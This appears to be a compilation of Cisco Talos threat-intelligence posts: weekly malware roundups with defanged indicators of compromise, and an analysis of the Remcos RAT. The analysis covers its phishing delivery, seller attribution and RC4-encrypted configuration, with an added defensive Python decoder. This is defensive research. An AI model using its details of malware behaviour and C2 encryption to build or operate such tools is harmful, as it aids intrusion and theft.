The CyberWire: https://thecyberwire.com/

==========

Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).  Special Guest: Dave Bittner (@bittner)
Hosted by Mitch Neff (@MitchNeff). 

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Threat Roundup for August 10-17


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 10 and August 17. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Dropper.Tovkater-6646868-0
    Dropper
    This malware is able to download and upload files, inject malicious code, and install additional malware.
     
  • Win.Dropper.Ainslot-6646850-0
    Dropper
    Ainslot appears to be a dropper for PonyStealer, a bot that attempts to steal passwords from a plethora of applications on an infected device (web browsers, email clients, instant messaging applications, and many others). Also, once on an infected machine, it attempts to spread itself to other computers on the network.
     
  • Win.Dropper.Shakblades-6646807-0
    Dropper
    Shakblades appears to be another dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications, and other applications.
     
  • Win.Dropper.Cerber-6646769-0
    Dropper
    Cerber is a ransomware variant which encrypts a user's personal data such as office documents, pictures, and music. Cerber also attempts to exfiltrate browser history.
     
  • Win.Dropper.Bublik-6646706-0
    Dropper
    Bublik appears to be a dropper that in this outbreak is used to drop CoinMiner, a cryptojacking virus that aims to use the computing resources of the infected machine to mine cryptocurrency.
     
  • Win.Dropper.Zbot-6646698-0
    Dropper
    Zbot (AKA Zeus bot) is information-stealing malware that targets users' banking credentials. You can read more on our blog: https://talosintelligence.com/zeus_trojan.
     

Threats

Win.Dropper.Tovkater-6646868-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
Mutexes
  • N/A
IP Addresses
  • 185[.]80[.]54[.]18
  • 5[.]149[.]255[.]178
Domain Names
  • strangerthingz[.]club
  • chubbyoasis[.]top
Files and or directories created
  • %LocalAppData%\Temp\nso9D20.tmp
  • %LocalAppData%\Temp\nst9D40.tmp\INetC.dll
  • %LocalAppData%\Temp\nst9D40.tmp\crub.exe
  • %LocalAppData%\Temp\nst9D40.tmp\nsJSON.dll
  • %LocalAppData%\Temp\nst9D40.tmp\boima765.exe
File Hashes
  • 122715db6467d64ff21864afc1d5e15f5780ed05dafda8085fad323ca5dd02f2
  • 13de4d085dfb857c5580425dcc787ee73b4dd78d0272e8a72d25915b6dedf9bd
  • 27dd184fb1b5505f6bc76c72395a50070c7b594963ad591b265cec17a3b4a6ca
  • 2a6753ea1a7a2289589550672980137480eadfc3c5d2a4135cbe152a72817b00
  • 2c72964b8a701a9aa90f6cc46adbf5da695f990f707e48fe62b5de48c4ea51ed
  • 359c2d5d7ebb5b6805c91951d0eb557027e6524795e144625eec951981199b0b
  • 44822b0f38e0a15c2128bc1c58afeccf45916539bede62501117e8ce106b95ce
  • 575fb1eca107f6999105302e60ae24992c335260c8761c9cdf676a3ca56bf389
  • 5c0a9f3375eff3b50d58092e17c2c9b464cbabbbb531b77069dbdcce59d6e05e
  • 63aecefbe9adc433f873e5ead9b846e3bc7aa35997594194b1fe3174ec42b84d
  • 66f336a2616a16d8891503dd145fb12835497a13f19a65946d6aa68242cc23ae
  • 74f523c55af0e9555345df23ee8e72ee05c44d37fad68950732c033b27aab0e2
  • 8ba4e8b2677e8bff0e3d527fffa0540b5a7ce4eb8dad4667f9426b9b224fab19
  • 9362f6da347323c27790bf53e2423299962a42ba11baec0a9efca344277ae027
  • 9db3546b5f6f8d60b1f635d07a10e8fc11e3b72f66161ee8621d29829fcbffbe
  • a1e41d046f3a8386c3115edc57a16c4da82d9607b35d7a635b1c14f1d94d2242
  • a70f8fd943406144850ce26d3a6103c32200dabd95563a2040d73ecf1b37ef2b
  • a7de2542cfb82d489531efc49f65fbc31b1808f2353c7f20b781a66c727a50f6
  • b760a4cea26c261519ed2a3a0814ae8e56ea10414e10213980e7eb34509fe571
  • d265dcde9fe14ca5524b4fdce20bcf31ff5a010376cb174df5c3a4ce819ef82d
  • da88d9c7c8010ea49472872d29c9c2d542a82a1f41e5726529dbdc34c363b6a3
  • dc265fc791815328bb9df123c19bced472b4d5621f9331ab679b710fb0da608e
  • ebb6267a01b66d6741497c9d780da069d6a7d3f17d2bfe287470da5ecee3975d
  • eedfbfa60755288a140b84ee00957c0032baba0bf299cea18d5fcca85e7d41f5

Coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella

Win.Dropper.Ainslot-6646850-0


Indicators of Compromise


Registry Keys
  • <HKCU>\Software\Microsoft\Windows\Currentversion\Run
  • <HKCU>\Software\VB and VBA Program Settings\SrvID\ID
  • <HKCU>\Software\VB and VBA Program Settings\INSTALL\DATE
  • <HKLM>\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • <HKLM>\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
    • Value Name: DoNotAllowExceptions
Mutexes
  • 944S06VZFP
IP Addresses
  • 94[.]73[.]22[.]65
Domain Names
  • facebookwanker[.]no-ip[.]biz
  • 5facebookwanker[.]no-ip[.]biz
  • 4facebookwanker[.]no-ip[.]biz
  • 7facebookwanker[.]no-ip[.]biz
  • 1facebookwanker[.]no-ip[.]biz
  • 2facebookwanker[.]no-ip[.]biz
  • 6facebookwanker[.]no-ip[.]biz
  • 9facebookwanker[.]no-ip[.]biz
  • 8facebookwanker[.]no-ip[.]biz
  • 3facebookwanker[.]no-ip[.]biz
Files and or directories created
  • %LocalAppData%\Temp\MQVCD.bat
  • %LocalAppData%\Temp\MQVCD.txt
  • %AppData%\winlogonr\winlogonr.exe
  • %AppData%\Bot.exe
  • %AppData%\Wow Logs
File Hashes
  • 05dd67a86f9b9d5afe4c069798350d8114784f25199777bf459fbd244e600200
  • 0cc20f105cf4630239cbb192b5085c5323ccddafe2804420d07bdc84e9f69f74
  • 18778b49fc35aec08184cd4426dc698bd7b89a47dce15861bb9fa4384641d6c9
  • 5908a9ebe9fc15e751f7ef39c2479413a96f6086899927d23ea7faa83b521fca
  • 5c4cd71d85e9fc4dabd709b64691acec25c9fba77b3ed6bbee63fc454ed77883
  • 637967a9e3b007d0007035df3344060ac332aed97f5b4a170a1fcfc5e1438672
  • 72967919bec8028198f4a79997dcd957a6d6c0a9dfb7dbe5b2ca29a00debb41f
  • 7659c69ab75e087038e59f6e60a2d7927503c390b212787342b4ba53e6f72fe8
  • 7b8fd7667a87cf87691feb2727ed78f832e8b84f4edb123057ac21fc173bdfcf
  • b411c969228d3324eae00e9468a05bf37ecef76fb81e41620dfc9d19bd067f47
  • d20f23c05b7781d2e5866336693f81041b8b20ab7135812a495d5f8dfb1e5ac5
  • d333daefccd7d188cffda7c75d589389140f24bfab759368217f2514ded312da
  • db3ff8db6b2387a8b4be629c96f4de36288a8945e6b0910ff9823ecaef92d96d
  • eb53dfbe1dcb04fd2ad9891f9d5ae3df926d7b9ee6865b06e040ca3ed91019e7
  • ec72aff9d0f5d5e8735589b554e2659ef8cb1f462057415f8c6219a1ae1b90a9
  • f7c8bec61762fa31fb766f50144cfeecabea3aad4d12818b4ee8969777181f87
  • f92ed6167aa17d2d242d5c0a15b63d5a2b2ab354ac0c9988d34dbe47d5138719
  • fccbb20a19943cac05429361f6ffb51b494e02b86748761e5d26d4bdac3a7ab3

Coverage

Screenshots of Detection: AMP

Win.Dropper.Shakblades-6646807-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • MSXLJHYHDS
IP Addresses
  • N/A
Domain Names
  • kreuz[.]hopto[.]org
Files and or directories created
  • %AppData%\1HVMD5254F.exe
  • %AppData%\DAVID
  • %AppData%\wrinlogfon\winlogfron.exe
  • %LocalAppData%\Temp\HIDBE.bat
  • %LocalAppData%\Temp\HIDBE.txt
File Hashes

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Cerber-6646769-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7
  • shell.{381828AA-8B28-3374-1B67-35680555C5EF}
IP Addresses
  • 94[.]21[.]172[.]0/27
  • 94[.]22[.]172[.]0/27
  • 94[.]23[.]172[.]0/24
  • 94[.]23[.]173[.]0/24
  • 94[.]23[.]174[.]0/24
  • 94[.]23[.]175[.]0/24
Domain Names
  • p27dokhpz2n7nvgr[.]1j9r76[.]top
  • hjhqmbxyinislkkt[.]1j9r76[.]top
Files and or directories created
  • %LocalAppData%\Temp\d19ab989
  • %LocalAppData%\Temp\d19ab989\4710.tmp
  • %LocalAppData%\Temp\d19ab989\a35f.tmp
  • %LocalAppData%\microsoft\office\groove\system\_READ_THI$_FILE_Y3VYE_.txt
  • %LocalAppData%\microsoft\office\groove\system\_READ_THI$_FILE_YPEAM_.hta
  • %LocalAppData%\microsoft\onenote\14.0\onenoteofflinecache_files\f173a3a2-bd1a-460f-b78a-faf2a51f6d91.png
  • %AppData%\microsoft\onenote\14.0\_READ_THI$_FILE_3SN82PK_.hta
  • %AppData%\microsoft\onenote\14.0\_READ_THI$_FILE_WMTDNF_.txt
  • %AppData%\microsoft\outlook\_READ_THI$_FILE_6GURWE_.txt
  • %AppData%\microsoft\outlook\_READ_THI$_FILE_WJ3WX_.hta
  • %UserProfile%\desktop\_READ_THI$_FILE_0H82B5G_.hta
  • %UserProfile%\desktop\_READ_THI$_FILE_AU0XA34M_.txt
  • %UserProfile%\documents\_READ_THI$_FILE_8F6J2D_.txt
  • %UserProfile%\documents\_READ_THI$_FILE_E96X_.hta
  • %UserProfile%\documents\onenote notebooks\notes\_READ_THI$_FILE_BUSBRQ4_.hta
  • %UserProfile%\documents\onenote notebooks\notes\_READ_THI$_FILE_C8LD5O_.txt
  • %UserProfile%\documents\onenote notebooks\personal\_READ_THI$_FILE_BMFXHU_.txt
  • %UserProfile%\documents\onenote notebooks\personal\_READ_THI$_FILE_OCWSSKQ_.hta
  • %UserProfile%\documents\outlook files\_READ_THI$_FILE_A5RM_.txt
  • %UserProfile%\documents\outlook files\_READ_THI$_FILE_LT8MXL_.hta
File Hashes

Coverage


Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Dropper.Bublik-6646706-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • DBWinMutex
IP Addresses
  • N/A
Domain Names
  • N/A
Files and or directories created
  • %AppData%\COIN-MINER.EXE
  • %AppData%\COINUTIL.DLL
  • %AppData%\MINER.DLL
  • %AppData%\PHATK.PTX
  • %AppData%\USFT_EXT.DLL
  • \SystemRoot\AppPatch\sysmain.sdb
File Hashes

Coverage


Screenshots of Detection

AMP

ThreatGrid

Win.Dropper.Zbot-6646698-0


Indicators of Compromise


Registry Keys
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
  • <HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\
  • <HKCU>\SOFTWARE\MICROSOFT\Exeboz
  • <HKCU>\Software\Microsoft\Windows\Currentversion\Run
Mutexes
  • Global\Instance0: ESENT Performance Data Schema Version 85
  • Local\Identity CRL v1 File Access
  • Local\MSIdent Logon
  • Local\microsoft_thor_folder_notifyinfo_mutex
  • Global\{2514E002-3297-704B-6F6E-B811A843C5E5}
  • Global\{2514E002-3297-704B-7365-B811B448C5E5}
  • Global\{2514E002-3297-704B-776C-B811B041C5E5}
  • Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7
IP Addresses
  • N/A
Domain Names
  • blessedgroup[.]biz
Files and or directories created
  • %LocalAppData%\Temp\ppcrlui_248_2
  • %LocalAppData%\Temp\ppcrlui_248_2.ui
  • %LocalAppData%\Temp\tmp5a3b8626.bat
  • %LocalAppData%\Temp\tmpb0cd0744.bat
  • %AppData%\Coviwys\mehotie.exe
  • %AppData%\Uwgav\ymyrus.kuq
File Hashes

Coverage


Screenshots of Detection

AMP

ThreatGrid

Picking Apart Remcos Botnet-In-A-Box



This blog post was authored by Edmund Brumaghin and Holger Unterbrink with contributions from Eric Kuhla and Lilia Gonzalez Medina.

Overview


Cisco Talos has recently observed multiple campaigns using the Remcos remote access tool (RAT) that is offered for sale by a company called Breaking Security. While the company says it will only sell the software for legitimate uses as described in comments in response to the article here and will revoke the licenses for users not following their EULA, the sale of the RAT gives attackers everything they need to establish and run a potentially illegal botnet.

Remcos' prices per license range from €58 to €389. Breaking Security also offers customers the ability to pay for the RAT using a variety of digital currencies. This RAT can be used to fully control and monitor any Windows operating system, from Windows XP and all versions thereafter, including server editions.

In addition to Remcos, Breaking Security is also offering Octopus Protector, a cryptor designed to allow malicious software to bypass detection by anti-malware products by encrypting the software on the disk. A YouTube video available on the Breaking Security channel demonstrates the tool's ability to facilitate the bypass of several antivirus protections. Additional products offered by this company include a keylogger, which can be used to record and send the keystrokes made on an infected system, a mass mailer that can be used to send large volumes of spam emails, and a DynDNS service that can be leveraged for post-compromise command and control (C2) communications. These tools, when combined with Remcos, provide all the tools and infrastructure needed to build and maintain a botnet.

Within Cisco's Advanced Malware Protection (AMP) telemetry, we have observed several instances of attempts to install this RAT on various endpoints. As described below, we have also seen multiple malware campaigns distributing Remcos, with many of these campaigns using different methods to avoid detection. To help people who became victims of a harmful use of Remcos, Talos is providing a decoder script that can extract the C2 server addresses and other information from the Remcos binary. Please see the Technical Details section below for more information.

Technical Details

Remcos distribution in the wild


Talos has observed several malware campaigns attempting to spread Remcos to various victims. Since Remcos is advertised and sold on numerous hacking-related forums, we believe it is likely that multiple unrelated actors are leveraging this malware in their attacks using a variety of different methods to infect systems. Earlier this year, RiskIQ published a report regarding an attacker who was reportedly targeting defense contractors in Turkey. Since then, this threat actor has continued to operate and has been observed targeting specific types of organizations. Talos has confirmed that in addition to defense contractors, this attacker has also targeted other organizations such as:
  • International news agencies;
  • Diesel equipment manufacturers and service providers operating within the maritime and energy sector; and
  • HVAC service providers operating within the energy sector.
In all of the observed campaigns, the attack begins with specially crafted spear phishing emails written in Turkish. The emails appear as if they were sent from a Turkish government agency and purport to be related to tax reporting for the victim's organization. Below is an example of one of these email messages:
The attacker put effort into making the emails look as if they were official communications from Gelir İdaresi Başkanlığı (GIB), the Turkish Revenue Administration, which operates under the Ministry of Finance and is responsible for handling taxation functions in Turkey. The attacker even went as far as to include official GIB graphics and the text at the bottom, which translates to:

"Thank you for your participation in the e-mail notification system of [the] Department of Revenue Administration's e-mail service. This message has been sent to you by GIB Mail Notification System. Please do not reply to this message."

As is common with many spear phishing campaigns, malicious Microsoft Office documents are attached to the emails. While the majority of these documents have been Excel spreadsheets, we have also observed the same attacker leveraging Word documents. In many cases, the contents of the document have been intentionally blurred as a way to entice victims to enable macros and view the content. Below is an example of a Word document associated with one of these campaigns that has been made to look as if it is a tax bill:
Many of the Excel spreadsheets we analyzed were mostly blank, and only included the following image and warning prompting the victim to enable macros in Turkish:
We have also observed campaigns that appear to be targeting English-speaking victims. Below is an example of one of the malicious attachments that was made to appear as if it were an invoice on letterhead associated with Iberia, which is the flagship airline in Spain.
In addition to the Iberia-themed malicious documents, we uncovered multiple malicious documents that were created to appear as if they were invoices associated with AMC Aviation, a Polish charter airline. Talos has observed the same itinerary decoy image used across both Excel and Word documents:
As described in the RiskIQ report, the macros in these files contain a small executable that is embedded into the document in the form of a series of arrays. When executed, the macros reconstruct the executable, save it to a specific location on the system and execute it. The file location specified changes across malicious documents, but includes directories commonly used by malware authors such as %APPDATA% and %TEMP%. The executable filename also changes across documents.

The extracted executable is simple and functions as the downloader for the Remcos malware. It is a very basic program and is used to retrieve Remcos from an attacker-controlled server and execute it, thus infecting the system. An example of this is below:
Remcos is a robust RAT that can be used to monitor keystrokes, take remote screen captures, manage files, execute commands on infected systems and more. In several cases, the distribution servers associated with these campaigns have been observed hosting several other malicious binaries in addition to Remcos.

Who is behind Remcos?


As previously mentioned, a company called Breaking Security has been offering Remcos and other questionable software for purchase on their website. There are no details about the company or the people behind it listed on its website. The website does, however, list a value-added tax (VAT) number (DE308884780) which shows the company is registered in Germany. Interestingly, you can look up the name and address of companies in almost any European Union (EU) country except Germany on this website. Germany does not share this information due to privacy concerns. Because Breaking Security was registered in Germany, we were unable to identify the name and address of the individual behind this company. Nevertheless, we were able to identify several artifacts that give us an idea as to who might be behind the company.
Comparison of Public and Private VAT Entries

The Breaking Security domain is hosted behind Cloudflare currently, and Whois privacy protects the registrant information. Quite a bit of effort has been put into attempting to mask who is behind this company and the associated software. During our analysis, we were able to uncover several clues about the individual that we believe is behind this organization, either due to mistakes or very well organized false evidence on the internet.

The first thing we identified was the following email address and domain present in the Viotto Keylogger screenshot below:

    logs@viotto[.]it
    viotto-security[.]net
While the viotto-security[.]net domain server and registrant information is protected similarly to what was seen with the breaking-security[.]net domain, the domain viotto[.]it listed in the "Sender's e-mail" text field is not. The Whois information associated with this domain can be seen in the screenshot below:
Normally, Talos would obfuscate this data; however, since it is public in so many places, we have elected not to. We also identified additional email, Jabber, and XMPP addresses that appear to be used by the author of Remcos by leveraging the data we collected from the website, as well as other sources:

    viotto@null[.]pm
    viotto24@hotmail[.]it
    viotto@xmpp[.]ru

In multiple cases, the domains investigated were leveraging the Cloudflare service. This often obscures the address of servers hosting domains, as the DNS configuration typically points the name resolution to Cloudflare IPs rather than the IP of the web servers themselves. One common mistake is that while the domain itself may be protected by Cloudflare, in many cases, a subdomain exists that does not point to Cloudflare servers, allowing the server IP address to be unmasked.

This was the case with the breaking-security[.]net domain. While Cloudflare shields the domain, their mail subdomains are not protected. The A record that was configured for the mail subdomains is as follows:

    mail[.]breaking-security[.]net. A 146.66.84[.]79
    webmail[.]breaking-security[.]net A 146.66.84[.]79

The IP address 146.66.84[.]79 is hosted at SiteGround Amsterdam. After various testing, we are confident that this is also the IP address where the main breaking-security[.]net website is hosted.

One of the other domains we identified as being associated with Remcos was viotto-security[.]net. This domain is currently configured to redirect traffic to the main breaking-security[.]net domain. However, this was not always the case. Searching for pages associated with this domain in the Wayback Machine, a website that allows users to view past versions of a web page, yields the following result in the form of a personal biography. There are multiple clear overlaps between the interests of this individual and the developer of the various tools the company sells:
We also identified several instances where Viotto was advertising, selling and supporting Remcos on various hacking forums, including HackForums since at least 2016, which makes their intentions questionable. Below is an example of one of these threads.
While the company states that they revoke user licenses if they were to use Remcos for illegal activity, as illustrated by the thread below, the purported official reseller of Remcos doesn't seem to mind another user informing it that they are using the software to control 200 bots.
Viotto also appears to be active on other hacking forums, including OpenSC, where he is a moderator. Below is a thread where this user is advertising Remcos and Octopus Protector.

Remcos Technical Details:


As described in other blog posts, Remcos appears to be developed in C++.
As the release notes show, it is actively maintained. The authors release new versions on almost a monthly basis:

v2.0.5 – July 14, 2018
v2.0.4 – April 6, 2018
v2.0.3 – March 29, 2018
v2.0.1 – Feb. 10, 2018
v2.0.0 – Feb. 2, 2018
v1.9.9 – Dec. 17, 2017

Remcos has the functionality that is typical of a RAT. It is capable of hiding in the system and uses malware techniques that make it difficult for a typical user to detect its presence.

Several routines look like they were just copied and (at best) slightly modified from publicly available sources. A good example is the anti-analysis section:
It checks for an outdated artifact, 'SbieDll.dll'. In our opinion, not many analysts use Sandboxie these days anymore. A closer look at the other functions also shows a high code similarity to publicly available projects. Below you can see the Remcos VMware detection code:
The following is a code sample from aldeid.com:
The blog referenced above has already described several Remcos features in detail. We would like to focus on Remcos' cryptographic implementation. It uses RC4 pretty much everywhere there is a need to decode or encode any data. Examples are registry entries, C2 server network communication and file paths, shown below:
The exepath registry data is base64-encoded, RC4-encrypted data. Decoded, it is the path of the executable:

C:\TEMP\1cc8f8b1487893b2b0ff118faa2333e1826ae1495b626e206ef108460d4f0fe7.exe

The RC4 implementation is the standard one that can be found in many code examples on the internet. They first build the Key Scheduling Algorithm (KSA) S-array at 00402F01.
This can be converted into the typical RC4 pseudo code:

for i from 0 to 255
    S[i] := i
endfor
j := 0
for i from 0 to 255
    j := (j + S[i] + key[i mod keylength]) mod 256
    swap values of S[i] and S[j]
endfor
This is followed by the RC4 pseudo-random generation algorithm (PRGA) at 00402F5B, which looks like this in pseudo code:

i := 0
j := 0
while GeneratingOutput:
    i := (i + 1) mod 256
    j := (j + S[i]) mod 256
    swap values of S[i] and S[j]
    K := S[(S[i] + S[j]) mod 256]
    output K
endwhile

As the screenshots above illustrate, Remcos is using RC4 to encrypt and decrypt its data, and it is using the PE resource section to store the initial encryption key in the 'SETTINGS' resource. This key can have a variable length — we have seen short keys from 40 bytes to keys with more than 250 bytes.
They store the data in the following format:

[Length of key]
[Encryption Key]
[Encrypted configuration data]

This encrypted configuration data section contains the command and control servers, RAT commands to execute and other data. Decoded, it looks like this:
The decoded data contains the C2 server, e.g. ejiroprecious[.]ddns[.]net, and the corresponding port number, followed by a password. This password is used to generate a separate S-array for the RC4-encrypted C2 communication. The picture shows the relevant part of the RC4 Key Scheduling Algorithm (KSA) from above.
Even if a stronger password is used than in the example above, using such a weak encryption scheme means that anyone who gets their hands on the binary file can extract the password and decrypt the C2 traffic, or inject their own commands into the C2 channel to control the RAT. The good news is that organizations that fall victim to Remcos have a good chance of analysing the threat if they have stored the network traffic and the Remcos binary file.

To make the life of forensic investigators easier, we are providing a small decoder Python script that can decode the config data from the resource section:
As mentioned above, Remcos is using the same encryption routine for all kinds of other functions, too. For this reason, the decoder program also offers an option to hand over encrypted bytes manually. This can be used to decode, for example, the exepath registry key.

We have used this tool to extract all the IOCs below. It is tested with the latest 2.0.4 and 2.0.5 versions of Remcos, but likely also works with other versions.
The user can also copy bytes from a network sniffer to a binary file and hand it over to decrypt the bytes from the C2 communication, to see which commands the C2 server has sent to the victim. Keep in mind to use the extracted password (e.g. "pass").
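The KSA, PRGA and SETTINGS layout described above, carried through as a small decoder in Python. This is an added example written for this page, not the Talos decoder script or Remcos code; the one-byte key-length field and the 'host:port|password|...' layout of the decoded config are assumptions, and every sample byte is constructed here rather than taken from a real sample.

```python
"""RC4 decoder for the Remcos SETTINGS layout described above.

Added example, not the Talos decoder script and not Remcos code.
Assumptions (not stated on the page): the key-length field is one byte,
decoded config fields are separated by '|', the first field is 'host:port'
and the second is the C2 password. All sample bytes are constructed.
"""
from typing import Dict, List


def rc4_ksa(key: bytes) -> List[int]:
    """Key Scheduling Algorithm: build the 256-entry S-array from the key."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_crypt(key: bytes, data: bytes) -> bytes:
    """PRGA: XOR data with the keystream. RC4 is symmetric, so one routine
    both encrypts and decrypts, which is how Remcos reuses it everywhere."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_self_test() -> bool:
    """Check the routine against the public test vector 'Key'/'Plaintext'."""
    return rc4_crypt(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"


def parse_settings(blob: bytes) -> Dict[str, bytes]:
    """Split a SETTINGS blob laid out as [key length][key][RC4-encrypted
    config] and return the key plus the decrypted configuration."""
    if len(blob) < 2:
        raise ValueError("blob too short to hold a key length and key")
    key_len = blob[0]                       # assumed one-byte length prefix
    if key_len == 0 or len(blob) < 1 + key_len:
        raise ValueError("declared key length does not fit inside the blob")
    key = blob[1:1 + key_len]
    return {"key": key, "config": rc4_crypt(key, blob[1 + key_len:])}


def extract_c2(config: bytes) -> Dict[str, object]:
    """Pull C2 host, port and password out of the decoded config."""
    fields = config.split(b"|")             # assumed field separator
    host, sep, port = fields[0].rpartition(b":")
    if not sep or len(fields) < 2:
        raise ValueError("config does not look like host:port|password|...")
    return {"host": host.decode(), "port": int(port.decode()),
            "password": fields[1]}


def decrypt_c2_message(password: bytes, captured: bytes) -> bytes:
    """C2 traffic is RC4 under the configured password, so a defender who
    holds the binary and a capture can recover the commands that were sent."""
    return rc4_crypt(password, captured)


def build_sample_settings(key: bytes, config: bytes) -> bytes:
    """Constructed helper: produce a blob in the layout above so the parser
    can be exercised offline without a real sample."""
    return bytes([len(key)]) + key + rc4_crypt(key, config)


# Constructed demo values, not real indicators.
SAMPLE_KEY = b"constructed-settings-key-0123456789abcdef"
SAMPLE_CONFIG = b"c2.example.invalid:5555|pass|constructed-field"
SAMPLE_BLOB = build_sample_settings(SAMPLE_KEY, SAMPLE_CONFIG)


if __name__ == "__main__":
    assert rc4_self_test()
    parsed = parse_settings(SAMPLE_BLOB)
    c2 = extract_c2(parsed["config"])
    print("C2:", c2)
    # Simulate a captured command encrypted under the C2 password.
    captured = rc4_crypt(c2["password"], b"constructed-command")
    print("decoded C2 bytes:", decrypt_c2_message(c2["password"], captured))
```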

Conclusion


While the organization that sells Remcos claims that the application is only for legal use, our research indicates it is still being used extensively by malicious attackers, as well. In some cases, attackers are strategically targeting victims to attempt to gain access to organizations that operate as part of the supply chain for various critical infrastructure sectors. Organizations should ensure that they are implementing security controls to combat Remcos, as well as other threats that are being used in the wild. Remcos is a robust tool that is being actively developed to include new functionality increasing what the attackers can gain access to. To combat this, organizations should continue to be aware of this threat, as well as others like this that may be circulated on the internet.

Coverage

 

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOC)


The following IOCs are associated with various malware distribution campaigns that were observed during analysis of Remcos activity.

Malicious Office Documents:

Stage 1 Executables:



PE32 Executables:


A text file containing a list of Remcos PE32 executable hashes can be found here.

IP Addresses:



Domains:



Threat Roundup for August 17-24


Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Aug. 17 and 24. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

  • Win.Dropper.Delf-6652911-0
    Dropper
    This family is a generic malware that is generally the first step of a deeper infection. Once the payload is executed on the machine, it downloads and runs new binaries. The malware is interested in credentials and focuses its attention on well-known applications such as Outlook, Thunderbird and Firefox, among others.
     
  • Win.Malware.Generic-6652641-0
    Malware
    These samples are generic trojans that establish persistence using the autorun key, contact a command and control (C2) server, and try to steal information from the infected host.
     
  • Win.Dropper.Generickdz-6652226-0
    Dropper
    This family is a generic malware that is generally the first step of a deeper infection. Once the payload is executed on the machine, it downloads and runs new binaries, such as Gandcrab.
     
  • Win.Dropper.Ponystealer-6652151-0
    Dropper
    This malware is a dropper for PonyStealer, a bot that attempts to steal passwords from web browsers, email clients, instant messaging applications, and other software.
     
  • Win.Dropper.Zbot-6651705-0
    Dropper
    Zeus (aka Zbot) is a trojan horse malware package used to carry out many malicious tasks. It is often used to steal banking information by man-in-the-browser keystroke logging and form grabbing.
     
  • PUA.Win.Adware.Ibryte-6651661-0
    Adware
    Ibryte appears to be a dropper for adware. It reaches out after installation to download adware and prompts to install them, including anti-virus programs and media players.
     
  • Win.Dropper.Razy-6651608-0
    Dropper
    Razy is oftentimes a generic detection name for a Windows trojan. Although more recent cases have found it attributed to ransomware that uses the .razy file extension when writing encrypted files to disk, these samples are the former case. They collect sensitive information from the infected host, format and encrypt the data, and send it to a C2 server.
     
  • Win.Dropper.Cloud-6651616-0
    Dropper
    The initial binary contains an AutoIt script. The script is obfuscated. It creates several in-memory DLL structures with AutoIt's DllStructCreate and DllStructSetData. The script then executes the shellcode injected into these DLL structures.
     
  • PUA.Win.Adware.Dotdo-6651541-0
    Adware
    This adware sets up a proxy to deliver advertisements to the machine's browser. In some variants, the adware also prevents security software from being downloaded to hinder its removal.
     
  • Win.Dropper.Fareit-6651429-0
    Dropper
    Fareit is malware designed to steal sensitive information, such as stored login information. You can read more about it on our blog.
     

Threats

